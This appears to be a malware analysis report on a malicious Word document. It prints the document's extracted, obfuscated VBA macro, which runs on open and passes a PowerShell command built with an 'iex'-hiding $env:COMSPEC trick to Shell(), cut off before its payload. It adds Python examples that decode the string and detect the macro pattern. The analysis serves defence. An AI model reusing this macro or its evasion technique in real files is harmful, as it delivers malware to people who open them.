Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 de72f482f5cdb637…

MALICIOUS

Office (OLE)

Size: 109.2 KB   Created: 2018-06-15 19:27:00   Authoring application: Microsoft Office Word   First seen: 2019-04-18
MD5: 74604a21f9317c5f062cd2e4e070fde1
SHA-1: 544210cb124a396e478594c8d7e80ba62d076f3b
SHA-256: de72f482f5cdb637bdece7c3ab3fe331ff068c47a94858701ded24d3f6d30b92
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

The sample contains a VBA macro that runs automatically when the document is opened: the module defines a Document_open handler (the OLE_VBA_DOCOPEN finding), which calls a function that invokes VBA.Shell(), the basis of the critical OLE_VBA_SHELL finding. The ClamAV detection name Doc.Malware.Valyria-6874636-0 corroborates the verdict. The extracted source is padded with junk arithmetic and Rnd() calls under On Error Resume Next, and the command passed to Shell() never appears as a single literal. It is assembled at runtime from Chr(vbKeyP) (vbKeyP is 80, so "P"; the operands added to it are never assigned anywhere in the visible source), the literal "owers", and fragments returned by helper functions. The fragments that are visible spell out a PowerShell command line beginning "PowersHeLL  . ( $env:coMSPEC[4,26,25]-jOIN'') (": indexing the default cmd.exe path at positions 4, 26 and 25 yields "iex", the Invoke-Expression alias, without that string ever appearing in the macro. The remainder is a run of digit groups separated by letter and punctuation delimiters that the PowerShell stage splits and decodes itself; that decoder lies beyond the truncated preview, so the final payload command or URL cannot be recovered from this report alone.
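The string assembly described above can be resolved statically, without running the macro. The Python below is an added example written for this report, not code from the analysis platform or from the sample: it parses a constructed excerpt modelled on the extracted macros.bas (the helper functions past the truncation point are not reproduced, so only the opening of the command is recovered), evaluates the concatenation the way VBA does under On Error Resume Next (an unassigned Variant is Empty and adds nothing), and then substitutes the $env:COMSPEC[4,26,25] -join '' idiom with the characters it selects from the default cmd.exe path. The names MacroResolver, split_top and resolve_comspec_idiom are this example's own.

```python
"""Statically recover the argument a VBA macro passes to Shell() and evaluate the
PowerShell $env:COMSPEC[i,j,k] -join '' idiom found in it. Added example, not the
platform's or the sample's code; it models only the constructs the visible macros.bas
uses, and anything else evaluates to Empty, which adds nothing to '+'."""
import re
# Constructed excerpt modelled on the extracted macros.bas (helpers past the truncation point are omitted).
VBA_SAMPLE = r'''
Function huQWaidES()
On Error Resume Next
huQWaidES = HOzfXt + VBA.Shell(vnBsN + Chr(DuqCroSPz + vbKeyP + vVztTjhcZs) + "owers" + QomLwriF + jKuBhYc, 1837 - 1837)
End Function
Function QomLwriF()
SBiEVB = "HeLL  . (" + " $" + "env:coMSPEC[" + "4,26," + "25]-jOIN" + "'') ("
MqqQjTV = "-jOiN(" + "'9" + "7V63<"
QomLwriF = SBiEVB + MqqQjTV
End Function
Function jKuBhYc()
jKuBhYc = "28r39~" + "11~39"
End Function
'''
VB_CONSTANTS = {f"vbKey{chr(c)}": c for c in range(65, 91)}  # vbKeyA..vbKeyZ = 65..90
PROC_HEADER = re.compile(r"\s*(?:Private\s+|Public\s+)?(?:Function|Sub)\s+(\w+)")
ASSIGN = re.compile(r"^(\w+)\s*=\s*(.*)$")

def split_top(expr, sep):
    """Split expr on sep outside quotes/parentheses; an unmatched ')' ends the
    expression, so the text after 'Shell(' splits into that call's arguments."""
    parts, cur, depth, in_str = [], [], 0, False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str and ch in "()":
            depth += 1 if ch == "(" else -1
            if depth < 0:
                break
        elif not in_str and ch == sep and depth == 0:
            parts.append("".join(cur).strip())
            cur = []
            continue
        cur.append(ch)
    parts.append("".join(cur).strip())
    return parts

class MacroResolver:
    def __init__(self, source):
        self.procs, self.shell_calls, current = {}, [], None
        for line in source.splitlines():
            head = PROC_HEADER.match(line)
            if head:
                current = head.group(1)
                self.procs[current] = []
            elif re.match(r"\s*End\s+(?:Function|Sub)", line):
                current = None
            elif current is not None:
                self.procs[current].append(line.strip())

    def eval_str(self, expr, local_vars, depth=0):
        if depth > 25:                                    # guard against recursive junk
            return ""
        terms = split_top(expr, "+")
        if len(terms) > 1:
            return "".join(self.eval_str(t, local_vars, depth + 1) for t in terms)
        term = terms[0]
        if len(term) >= 2 and term[0] == term[-1] == '"':
            return term[1:-1].replace('""', '"')           # VBA doubles quotes inside literals
        chr_call = re.fullmatch(r"Chr[W$]?\((.*)\)", term)
        if chr_call:                                      # Chr(x + vbKeyP + y): unassigned x, y are 0
            return chr(sum(int(t) if t.isdigit() else VB_CONSTANTS.get(t, 0)
                           for t in split_top(chr_call.group(1), "+")))
        if term in local_vars:
            return local_vars[term]
        if term in self.procs:
            return self.run(term, depth + 1)
        return ""                                         # Empty contributes nothing to '+'

    def run(self, name, depth=0):
        """Evaluate a procedure's assignments in order, recording the first argument of
        any Shell() call; return what it assigned to its own name (a Function's result)."""
        local_vars = {}
        for line in self.procs.get(name, []):
            shell = re.search(r"\bShell\s*\(", line)
            if shell:
                cmd = self.eval_str(split_top(line[shell.end():], ",")[0], local_vars, depth)
                self.shell_calls.append((name, cmd))
            assign = ASSIGN.match(line)
            if assign:
                local_vars[assign.group(1)] = self.eval_str(assign.group(2), local_vars, depth)
        return local_vars.get(name, "")

    def find_shell_commands(self):
        for name in self.procs:
            self.run(name)
        return self.shell_calls

def resolve_comspec_idiom(command, comspec=r"C:\Windows\system32\cmd.exe"):
    """Replace each $env:COMSPEC[i,j,k] -join '' with the characters it selects: with the
    default path, [4,26,25] spells 'iex' (Invoke-Expression); a non-default COMSPEC breaks it."""
    pattern = re.compile(r"\$env:comspec\[([\d,\s]+)\]\s*-join\s*''", re.I)
    return pattern.sub(lambda m: "".join(comspec[int(i)] for i in m.group(1).split(",")), command)
```

Running `MacroResolver(VBA_SAMPLE).find_shell_commands()` returns the procedure name and the recovered command prefix; passing that through `resolve_comspec_idiom` rewrites the COMSPEC expression to `iex`, which is the point of the idiom: the dangerous alias is never present as a literal for a string-matching scanner to find, and it only works because the attacker can rely on the default Windows install path.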

Heuristics (6)

  • ClamAV: Doc.Malware.Valyria-6874636-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6874636-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro source calls Shell(), which runs an external command (here VBA.Shell in the function huQWaidES)
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    A Document_Open handler runs macro code automatically when the document is opened, with no user action beyond enabling macros
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard OOXML DrawingML namespace URI, not an attacker-controlled address.
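The Python below is an added example, not the scanner's own implementation, showing the shape of the three macro heuristics above (OLE_VBA_DOCOPEN, OLE_VBA_SHELL and the p-code co-occurrence rule OLE_VBA_PCODE_AUTOEXEC_EXEC) as a token scan over a raw VBA stream. The token lists, the rule wiring and the three byte-string inputs are constructed for illustration; the rule names are reused from the list above so the output reads like the report. Matching both ASCII and UTF-16LE spellings is what lets the rule fire on compiled or cache streams when source extraction fails, and the benign second input shows that an auto-open entry point alone does not trigger the co-occurrence rule.

```python
"""Token co-occurrence triage of a raw VBA stream, modelled on the OLE_VBA_DOCOPEN,
OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics. Added example, not the
scanner's implementation; token lists, rule wiring and inputs are assumptions."""
import re

AUTOEXEC_TOKENS = ("Document_Open", "AutoOpen", "Auto_Open", "Workbook_Open", "AutoExec", "AutoClose")
EXEC_TOKENS = ("Shell", "WScript.Shell", "CreateObject", "GetObject", "ShellExecute", "CallByName")
DOWNLOAD_TOKENS = ("URLDownloadToFile", "XMLHTTP", "WinHttpRequest", "ADODB.Stream")

# Constructed inputs, not the sample's real streams: decoded source shaped like the
# macro above; a benign auto-open template; and a compiled-stream stand-in where the
# identifiers survive only as UTF-16LE among binary noise and no source was extracted.
MACRO_SOURCE = b'Private Sub Document_open()\r\nOn Error Resume Next\r\nx = VBA.Shell(cmd, 0)\r\nEnd Sub\r\n'
BENIGN_SOURCE = b'Private Sub Document_Open()\r\nMsgBox "Welcome"\r\nEnd Sub\r\n'
PCODE_LIKE = (b"\x00\x01\x02\xcc" + "AutoOpen".encode("utf-16-le") + b"\xff\xfe\x00\x09"
              + "CreateObject".encode("utf-16-le") + b"\x00\x00")

def find_tokens(data: bytes, tokens) -> set:
    """Return the canonical spelling of each token present in data. ASCII matches are
    case-insensitive and bounded by non-identifier bytes (so 'Shell' does not fire on
    'ShellExecute'); UTF-16LE matches cover identifiers stored wide in OLE streams."""
    found = set()
    for tok in tokens:
        narrow = rb"(?<![A-Za-z0-9_])" + re.escape(tok.encode("ascii")) + rb"(?![A-Za-z0-9_])"
        wide = re.escape(tok.encode("utf-16-le"))
        if re.search(narrow, data, re.I) or re.search(wide, data, re.I):
            found.add(tok)
    return found

def scan_vba_stream(data: bytes) -> dict:
    """An auto-execution entry point alone is ordinary (templates have them), so the
    co-occurrence rule fires only when the same stream also carries an execution or
    download capability; Document_Open and Shell() still get their own findings."""
    autoexec = find_tokens(data, AUTOEXEC_TOKENS)
    execution = find_tokens(data, EXEC_TOKENS) | find_tokens(data, DOWNLOAD_TOKENS)
    findings = []
    if "Document_Open" in autoexec:
        findings.append("OLE_VBA_DOCOPEN")
    if "Shell" in execution:
        findings.append("OLE_VBA_SHELL")
    if autoexec and execution:
        findings.append("OLE_VBA_PCODE_AUTOEXEC_EXEC")
    return {"autoexec": sorted(autoexec), "execution": sorted(execution), "findings": findings}
```

On the first input `scan_vba_stream` reports all three findings, on the benign template only OLE_VBA_DOCOPEN, and on the compiled-stream stand-in only the co-occurrence rule, since no decompiled source exists for the two source-level heuristics to inspect. Real p-code streams also store identifiers in a dictionary of compressed records rather than as plain UTF-16LE runs, which is why production scanners decompress the stream first; the encoding handling here is the minimum that makes the rule's intent concrete.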

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  10298 bytes
SHA-256: 041cb49e887ad84f2492cfdd1a53127ac36a2aee081ef818f9ea7e0d8c405bdd

Preview: first 1,000 lines of the extracted script (the copy reproduced below is cut off at the line marked truncated)
Attribute VB_Name = "WnhUMPbktu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function huQWaidES()
On Error Resume Next
AqNrEU = 10958 + HISku
qdViX = (26648 * Sgn(buWhGP) / 95749 / OvHwCH * FFOZi + ChrW(RGGmFn) / imnMj * CInt(VhjiE))
wbDMLX = QZGlRP
XNsqf = Rnd(rIRZw)
wjrJo = 32268 + AbkTcI
RtimGW = (43905 * Sgn(wMLtP) / 67360 / jOziD * ENXtzp + ChrW(iDaCt) / dHzwMF * CInt(hTnboI))
QzmhYa = QfQHu
wSKLd = Rnd(MJaYQ)
ftlIz = 53836 + wjPmc
sQbqF = (10833 * Sgn(VBaBS) / 77357 / mIACdw * ubFKn + ChrW(kNhHa) / wjoVsJ * CInt(EwzLYd))
AlavF = zCzlKd
FkRQZr = Rnd(MfGsHh)
pnITS = 52299 + qzzmIs
wVlzzM = (83030 * Sgn(Rofszq) / 51458 / MHork * zDZowv + ChrW(Noivho) / MwnvB * CInt(aoPXk))
rcvQhh = GZTkX
JKuzj = Rnd(hcwpWj)
huQWaidES = HOzfXt + VBA.Shell(vnBsN + Chr(DuqCroSPz + vbKeyP + vVztTjhcZs) + "owers" + QomLwriF + jKuBhYc + DoPRzTDjiBz + DhYpTKZc + NNIZaCuJqJP, 1837 - 1837)
vJDzz = 94368 + CFzOT
OYfziY = (57193 * Sgn(GuXoSa) / 39490 / puwsCq * uJtZFF + ChrW(VCWJir) / GVqpK * CInt(mrWVak))
pjOLnB = IzoBc
vuMMvj = Rnd(JVhaK)
dKZVS = 15701 + cRjYIC
KwlQk = (82689 * Sgn(hYMWE) / 26305 / HCaVuh * QEiCMA + ChrW(sYwVf) / ijfSoR * CInt(KidjiK))
HqCmYw = klbzm
JuCkk = Rnd(vlpkz)
End Function
Private Sub Document_open()
On Error Resume Next
qOozO = 2083 + izaWI
QaBopc = (8497 * Sgn(bXViP) / 59887 / fQnLD * cJwMQ + ChrW(tVFYi) / VlwcLl * CInt(DRBYMw))
cwihbC = CkpKN
NiLFF = Rnd(jurDO)
bKuVw = 82105 + tuJCEB
jbBzh = (49013 * Sgn(LSsXjZ) / 42397 / RcCUP * jLMMj + ChrW(NVzdu) / cKVswc * CInt(UqzGku))
zHakl = Edhzl
XLWTC = Rnd(KUnRDb)
huQWaidES
HWqUP = 54100 + wLfZjZ
MHKGD = (22329 * Sgn(VwzfrI) / 93607 / DjMUF * cLSKMS + ChrW(FUIXRL) / pBZWUw * CInt(vKBNT))
uKjEcS = CBiwz
PMmAf = Rnd(WVzPpk)
wPdrHZ = 92870 + YCHqz
jBtJd = (62353 * Sgn(BGSTtn) / 45402 / ivNfc * LDvawz + ChrW(aHdEMz) / KftdJ * CInt(GKOjX))
RjARz = wWHAmv
HwUVc = Rnd(cjwrvq)
End Sub


Attribute VB_Name = "VloMmGSp"
Function QomLwriF()
On Error Resume Next
mBZlT = kTVSkh
AKLmTG = Rnd(pRsSSX)
vvkpLh = (33978 * Sgn(jEpVuO) / 94722 / lZvld * PThwz + ChrW(VsOJoL) / HWkBqD * CInt(FwjPZM))
oNjuW = 90714 + CHZNYV
SBiEVB = "HeLL  . (" + " $" + "env:coMSPEC[" + "4,26," + "25]-jOIN" + "'') (" + "-jOiN(" + "'9" + "7V63<"
TjSZlv = IVTsF
QjspwG = Rnd(fQHMji)
bFdoHU = (47014 * Sgn(FEhqc) / 94491 / iVlOGt * honwn + ChrW(fVLpdw) / aXiwN * CInt(fNfkiI))
nqfhi = 68041 + jBXEhz
MqqQjTV = "28r39~11~3" + "9N101{120" + "V101{43V32N50" + "~104N42V39" + "{47~" + "32{3" + "8r49r101~55N"
wCEEp = dEVdLi
VaAidz = Rnd(OYoBJh)
ABihn = (61647 * Sgn(tcnrU) / 53738 / MPNtc * iPWkw + ChrW(suhPO) / jchHbE * CInt(UcUWO))
mkssN = 62394 + JKmoBf
WUQUf = "36s43r33~" + "42G40{12" + "6J97V7<7x2" + "9<50{17N101G1" + "20~101N43<3"
IsHrKt = XMFTd
kNYRp = Rnd(jiKYk)
IiwZEw = (53740 * Sgn(ThhVJJ) / 81189 / wOpNB * rbTOrY + ChrW(YOUiTE) / MMumcK * CInt(LaVAkR))
wkTnHL = 25289 + KlwiE
hIhjV = "2J" + "50x104" + "N42s3" + "9V47N32s3" + "8V4" + "9J101" + "r22s6"
QomLwriF = SBiEVB + MqqQjTV + WUQUf + hIhjV
End Function
Function jKuBhYc()
On Error Resume Next
rJjAzN = HEKXq
NqdQq = Rnd(nWGpF)
duGqF = (9492 * Sgn(ZHtsNi) / 20163 / UiaWZf * AHWIbw + ChrW(wkvVdN) / pwjPW * CInt(jPomS))
CvSMr = 81006 + womUD
zwvMY = "0V54~49~" + "32" + "V40" + "s107V11G32V4" + "9x107" + "V1" + "8V32r39r6{41G44" + "{32s43G49~126s9"
DUOlT = pYXJcA
amVkB = Rnd(hiuzU)
EviPqi = (68455 * Sgn(niaGru) / 33448 / EHmpt * NPIjk + ChrW(ELUjI) / nFOHo * CInt(KVQmn))
djdJJw = 85213 + zWiju
ipqBj = "7r53~47x7r" + "14V4" + "0G1" + "01s120<101~98" + "N45V49G49{53"
fYzaci = vimtS
boYSSB = Rnd(KAriSG)
wCwXwA = (57209 * Sgn(iooYt) / 62513 / iNaVhJ * btHqcG + ChrW(tuiuEz) / KnvwqU * CInt(kJCizR))
tchbN = 88998 + oGLrzT
wtdncVXj = "V127r106" + "x106G50G50G50r" + "107" + "N36N43" + "x36s41r60" + "s49x44r38{54" + "G1" + "07V49x45" + "r32~" + "40x44G4"
hrkEHi = kYiLJX
VMXlj = Rnd(aCQ
... (truncated)